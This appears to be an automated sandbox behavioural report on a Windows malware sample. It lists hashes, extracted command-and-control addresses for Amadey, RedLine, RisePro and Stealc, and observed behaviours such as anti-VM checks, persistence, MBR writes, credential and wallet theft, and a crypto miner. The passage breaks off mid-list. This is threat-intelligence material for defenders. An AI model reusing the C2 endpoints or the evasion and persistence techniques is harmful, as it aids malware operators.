Analysis
-
max time kernel
108s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 23:27
Behavioral task
behavioral1
Sample
0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Resource
win10v2004-20240426-en
General
-
Target
0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
-
Size
1.7MB
-
MD5
7436868f4ea3111d204d5f5eea08eec5
-
SHA1
1ffba75eec05fed9564966eeca1cfcb6c5751774
-
SHA256
0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447
-
SHA512
04397d86398d7582c07172b38193a97cf4454a660c4af999b9347e23561e2648c36eb3ac98ce948f1239159709cfec991780ab45e88fe48d8e3dc7e36a1ee939
-
SSDEEP
49152:UsVMbU+osuveQdNoTA4K8eFq+ljjW8uh5qcVBp:TVMbDosuvqTA9Fqr8a5qmp
Malware Config
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:26260
Extracted
stealc
http://49.13.229.86
-
url_path
/c73eed764cc59dcb.php
Signatures
-
Detect ZGRat V1 11 IoCs
resource yara_rule behavioral1/memory/1508-149-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 behavioral1/files/0x0007000000023480-171.dat family_zgrat_v1 behavioral1/memory/4260-191-0x0000000000E50000-0x0000000000F10000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-500-0x0000000006D80000-0x0000000006FC0000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-507-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-515-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-513-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-511-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-509-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-505-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 behavioral1/memory/5144-502-0x0000000006D80000-0x0000000006FBA000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" NeAGl25FmYwj6ACIaYUtGrMy.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral1/files/0x000700000002347f-170.dat family_redline behavioral1/memory/2908-172-0x0000000000840000-0x0000000000892000-memory.dmp family_redline behavioral1/files/0x0007000000023480-171.dat family_redline behavioral1/memory/4260-191-0x0000000000E50000-0x0000000000F10000-memory.dmp family_redline behavioral1/files/0x000a000000023485-214.dat family_redline behavioral1/memory/3464-236-0x00000000003B0000-0x0000000000402000-memory.dmp family_redline -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x000d00000002351d-5708.dat family_xmrig behavioral1/files/0x000d00000002351d-5708.dat xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5b90bb2e7c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NeAGl25FmYwj6ACIaYUtGrMy.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe -
pid Process 1460 powershell.exe 6628 powershell.exe 5704 powershell.exe 6768 powershell.exe 5648 powershell.exe 2920 powershell.exe 5832 powershell.exe 6092 powershell.exe 6740 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5b90bb2e7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NeAGl25FmYwj6ACIaYUtGrMy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5b90bb2e7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NeAGl25FmYwj6ACIaYUtGrMy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation NewB.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation BVxPj6l9QxCZTHbu40cqRJcP.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation amers.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation install.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation dl.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation r68KCX9sUSmVjFbWX1AIpKq5.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation explorku.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation 360TS_Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation axplons.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation regasm.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 64 IoCs
pid Process 552 explorku.exe 1912 amers.exe 3972 explorku.exe 4400 axplons.exe 4644 5b90bb2e7c.exe 3412 installer.exe 3232 alex.exe 2908 keks.exe 4260 trf.exe 3792 gold.exe 3464 redline1.exe 4376 install.exe 1356 GameService.exe 1944 GameService.exe 3836 GameService.exe 1320 GameService.exe 3160 GameService.exe 2520 GameSyncLink.exe 1288 336234.exe 400 swizzhis.exe 3360 GameService.exe 376 GameService.exe 3048 GameService.exe 2312 GameService.exe 2580 GameService.exe 376 lumma1.exe 2204 NewB.exe 5252 PiercingNetLink.exe 5368 dl.exe 5608 file300un.exe 5868 toolspub1.exe 5144 Kaxhwswfup.exe 1248 4767d2e713f2021e8fe856e3ea638b58.exe 4008 FirstZ.exe 2628 GameService.exe 6948 GameService.exe 6976 GameService.exe 6732 GameService.exe 3708 GameSyncLinks.exe 1480 439140.exe 6700 r68KCX9sUSmVjFbWX1AIpKq5.exe 5152 FKR0OwQ8FPy97VHjHRn7i28G.exe 6244 8KKGFVK0Veg85868zSfIctOh.exe 5376 LoISfdzmXD8umnMNLvylqo1y.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 6876 3m8qyPuMAiVuB9wnCRIyhvEJ.exe 6956 explorku.exe 6316 axplons.exe 3680 425616.exe 3504 NewB.exe 3500 4767d2e713f2021e8fe856e3ea638b58.exe 5864 reakuqnanrkn.exe 5932 $77848fd0 3980 $77aa2932 7116 360TS_Setup.exe 6336 8KKGFVK0Veg85868zSfIctOh.exe 4600 3m8qyPuMAiVuB9wnCRIyhvEJ.exe 3672 LoISfdzmXD8umnMNLvylqo1y.exe 696 FKR0OwQ8FPy97VHjHRn7i28G.exe 5548 360TS_Setup.exe 6044 NeAGl25FmYwj6ACIaYUtGrMy.exe 5936 2p097Kk7WbMab2fM15eWYNGJ.exe 1832 Install.exe 2552 WWuoQ9lCzATl2n5JrfVx9Jgg.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Wine axplons.exe -
Loads dropped DLL 5 IoCs
pid Process 1288 336234.exe 6300 BVxPj6l9QxCZTHbu40cqRJcP.exe 7116 360TS_Setup.exe 5548 360TS_Setup.exe 5548 360TS_Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/4424-0-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-2-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-7-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-5-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-3-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-4-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-1-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-6-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/4424-8-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/files/0x000700000002346a-14.dat themida behavioral1/memory/4424-21-0x0000000000C90000-0x00000000011DF000-memory.dmp themida behavioral1/memory/552-22-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-24-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-25-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-23-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-28-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-26-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-27-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-29-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/552-30-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-52-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-55-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-58-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-57-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-54-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-56-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-53-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/3972-51-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/files/0x00080000000233ee-77.dat themida behavioral1/files/0x00080000000233ee-90.dat themida behavioral1/files/0x00080000000233ee-89.dat themida behavioral1/memory/4644-93-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-95-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-97-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/3972-100-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/4644-99-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-98-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-96-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-94-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-92-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/4644-91-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/552-133-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/4644-337-0x00000000002E0000-0x0000000000976000-memory.dmp themida behavioral1/memory/6956-5677-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/memory/6956-5696-0x00000000008D0000-0x0000000000E1F000-memory.dmp themida behavioral1/files/0x000900000002352c-5896.dat themida behavioral1/memory/6044-5913-0x0000000140000000-0x0000000140F7A000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b90bb2e7c.exe = "C:\\Users\\Admin\\1000006002\\5b90bb2e7c.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5b90bb2e7c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NeAGl25FmYwj6ACIaYUtGrMy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 43 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 105 ipinfo.io 106 ipinfo.io 103 api.myip.com 104 api.myip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 BVxPj6l9QxCZTHbu40cqRJcP.exe File opened for modification \??\PhysicalDrive0 360TS_Setup.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini NeAGl25FmYwj6ACIaYUtGrMy.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol NeAGl25FmYwj6ACIaYUtGrMy.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI NeAGl25FmYwj6ACIaYUtGrMy.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe File opened for modification C:\Windows\System32\GroupPolicy NeAGl25FmYwj6ACIaYUtGrMy.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1912 amers.exe 4400 axplons.exe 6316 axplons.exe 6044 NeAGl25FmYwj6ACIaYUtGrMy.exe 6044 NeAGl25FmYwj6ACIaYUtGrMy.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 3232 set thread context of 1508 3232 alex.exe 102 PID 3792 set thread context of 3824 3792 gold.exe 111 PID 400 set thread context of 3816 400 swizzhis.exe 129 PID 376 set thread context of 4856 376 lumma1.exe 143 PID 5704 set thread context of 5880 5704 powershell.exe 173 PID 5144 set thread context of 5932 5144 Kaxhwswfup.exe 271 PID 5144 set thread context of 3980 5144 Kaxhwswfup.exe 275 -
Drops file in Program Files directory 17 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\1715729366_0\360TS_Setup.exe 360TS_Setup.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File opened for modification C:\Program Files (x86)\1715729366_0\360TS_Setup.exe 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\writeable_test_240708984.dat 360TS_Setup.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorku.job 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5432 sc.exe 1224 sc.exe 4472 sc.exe 5692 sc.exe 1972 sc.exe 5088 sc.exe 1520 sc.exe 2528 sc.exe 6216 sc.exe 7052 sc.exe 2844 sc.exe 640 sc.exe 6116 sc.exe 2024 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 20 IoCs
pid pid_target Process procid_target 1396 3232 WerFault.exe 101 1636 5368 WerFault.exe 147 5164 5368 WerFault.exe 147 5452 5868 WerFault.exe 153 5916 5368 WerFault.exe 147 6560 5368 WerFault.exe 147 5796 5368 WerFault.exe 147 4388 5368 WerFault.exe 147 6828 5368 WerFault.exe 147 1392 5368 WerFault.exe 147 5400 5368 WerFault.exe 147 4388 6700 WerFault.exe 193 1696 6700 WerFault.exe 193 4500 6700 WerFault.exe 193 5680 6700 WerFault.exe 193 6164 6700 WerFault.exe 193 6720 6700 WerFault.exe 193 6744 6700 WerFault.exe 193 1012 6700 WerFault.exe 193 4036 6700 WerFault.exe 193 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5172 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 1004 taskkill.exe 4292 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 4767d2e713f2021e8fe856e3ea638b58.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) 